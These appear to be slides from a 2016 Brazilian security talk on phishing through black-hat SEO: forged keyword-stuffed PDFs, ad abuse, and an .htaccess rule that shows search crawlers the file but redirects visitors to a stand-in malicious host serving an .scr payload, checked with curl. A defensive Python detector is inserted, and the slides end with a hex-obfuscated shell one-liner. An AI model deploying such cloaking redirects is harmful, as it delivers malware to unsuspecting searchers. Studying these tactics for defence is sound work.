
Phishing through the tactics of

<h1>BL4CK H4T SEO</h1>


<p>The New Phisher Arsenal</p>
Campus Party Brasil 2016

0x27null@phishing:~$ php wh0am1.php


[ + ] Name: Cleiton Pinheiro
[ + ] E-mail: 0x27null@gmail.com
[ + ] Twitter: @0x27null
[ + ] Blog: http://blog.0x27null.com
[ + ] GIT: https://github.com/googleinurl
[ + ] Specialty: GED - Gambiarras Exploits Dorking
-------------------------------------------------------------------------------------------
Information security enthusiast, creator of the INURL BRASIL group, PHP / C# developer.
Currently works at El Pescador, a Tempest group company.
-------------------------------------------------------------------------------------------

Forging a PDF document


<h2>D0CUM3NT0 PDF</h2>

OCR
Optical Character Recognition


<h2>F0RG3D PDF</h2>
<h3>ESTRUTURA - PDF OUTPUT</h3>
The criminal's goal is to pack the forged files with as many keywords tied to the target audience as possible.

1. {image}
2. {random title} - {current date}
3. {random keywords}
4. {random hashtag keywords}
5. {complementary text}
6. {keywords formatted as links}


The phisher's side

<h2>S3RVER S1DE</h2>
MOD1FIED .htaccess F1LE

To hack on a significant scale and also guarantee that victims reach his (URLs || malicious files), the criminal can tune the .htaccess file so that the indexing bot (web crawler) can access its content but the target user cannot, because the user is redirected to a third-party site.

<ifmodule mod_rewrite.c>
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} !(Googlebot|bingbot|Yahoo)
RewriteRule (.+\.pdf)$ http://www.sitemalicioso2.uk/exploit-pdf.scr [R=301,L]
</ifmodule>

# TE5T R3QUEST:
0x27null@phishing:~$ curl localhost/teste/Carro.pdf -v | grep '301'
# RETURN HTTP HEADER:
< HTTP/1.1 301 Moved Permanently
< Server: Apache/2.4.12 (Ubuntu)
< Location: http://www.sitemalicioso2.uk/exploit-pdf.scr

# TE5T R3QUEST / SE7 USER-AGENT BOT:
0x27null@phishing:~$ curl -I localhost/teste/Carro.pdf -v --user-agent \
'XX/5.0(compatible;Googlebot/2.1;+http://www.google.com/bot.html)' -v | grep --color \
'pdf'
# RETURN HTTP HEADER:
< HTTP/1.1 200 OK
< Server: Apache/2.4.12 (Ubuntu)
< Content-Type: application/pdf
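The defender's view of the rule above, as an added example that is not part of the original slides: a Python scanner that reads an .htaccess file and flags any RewriteRule that redirects off-site depending on whether the User-Agent names a search-engine crawler. The function name `find_ua_cloaking`, the extra crawler names and the benign sample are assumptions made for illustration.

```python
import re

# Crawler names: the three from the slide's rule plus a few common ones (assumption).
CRAWLERS = ("googlebot", "bingbot", "yahoo", "slurp", "baiduspider", "yandex")
COND_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_USER_AGENT\}\s+(\S+)", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)", re.I)

def find_ua_cloaking(htaccess_text):
    """Flag RewriteRules that redirect off-site depending on a crawler User-Agent."""
    findings, pending = [], []   # pending: UA conditions awaiting the next RewriteRule
    for lineno, line in enumerate(htaccess_text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        cond = COND_RE.match(line)
        if cond:
            pattern = cond.group(1).strip('"')
            names = [c for c in CRAWLERS if c in pattern.lower()]
            if names:
                pending.append((pattern.startswith("!"), names))
            continue
        rule = RULE_RE.match(line)
        if not rule:
            continue
        target = rule.group(2)
        if target.lower().startswith(("http://", "https://")):
            for negated, names in pending:
                findings.append({
                    "line": lineno,
                    "redirected": "non-crawlers" if negated else "crawlers",
                    "crawlers": names,
                    "target": target,
                })
        pending = []             # RewriteCond lines only apply to the next RewriteRule
    return findings

# Constructed samples: the first reuses the rule shown on the slide.
SLIDE_HTACCESS = r"""<ifmodule mod_rewrite.c>
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} !(Googlebot|bingbot|Yahoo)
RewriteRule (.+\.pdf)$ http://www.sitemalicioso2.uk/exploit-pdf.scr [R=301,L]
</ifmodule>"""
BENIGN_HTACCESS = r"""RewriteEngine on
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://example.org/$1 [R=301,L]"""

if __name__ == "__main__":
    for name, text in (("slide", SLIDE_HTACCESS), ("benign", BENIGN_HTACCESS)):
        print(name, find_ua_cloaking(text))
```

Run over the web roots of a site suspected of compromise, a finding means the response served to the indexer differs from the one served to visitors, which is the condition the two curl requests on the slide confirm by hand.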


Trust relationship

<h2>600gl3 AdWord5</h2>

Potential daily reach: 1K clicks, 57K impressions


Ad


<h2>BUSC4 1NF3CTAD4</h2>
ORGANIC R3SULT

SPONSORED R3SULT

This exploits the trust relationship between users and their favorite web application, because the application will not offer used-car content to someone who mostly likes pages (Facebook), searches keywords about cinema, or searches for sewing (Corte e Costura).


Infographic


<marquee>TH4NK Y0U</marquee>
0x27null@phishing:~$ php c0n7a7o.php
[ + ] Name: Cleiton Pinheiro
[ + ] E-mail: 0x27null@gmail.com
[ + ] Twitter: @0x27null
[ + ] Blog: http://blog.0x27null.com
[ + ] GIT: https://github.com/googleinurl
[ + ] Specialty: GED - Gambiarras Exploits Dorking
-------------------------------------------------------------------------------------------
0x27null@phishing:~$ POF=$(Z=`echo '6964' | xxd -r -p`;$Z;Y=`echo '637572696F73697479206B696C6C65642074686520636174' | xxd -r -p`;echo $Y;W=`echo '202045723420756d342076337a20756d20703435356172302078346d61646f20636f72756a342e2e20456c3320666f312076306172206e6f203376656e746f2063346d7075732070347274792e2e206520636169752064652063617234206e302058346f2e202d2d20462049204d' | xxd -r -p`;echo $W);echo $POF;
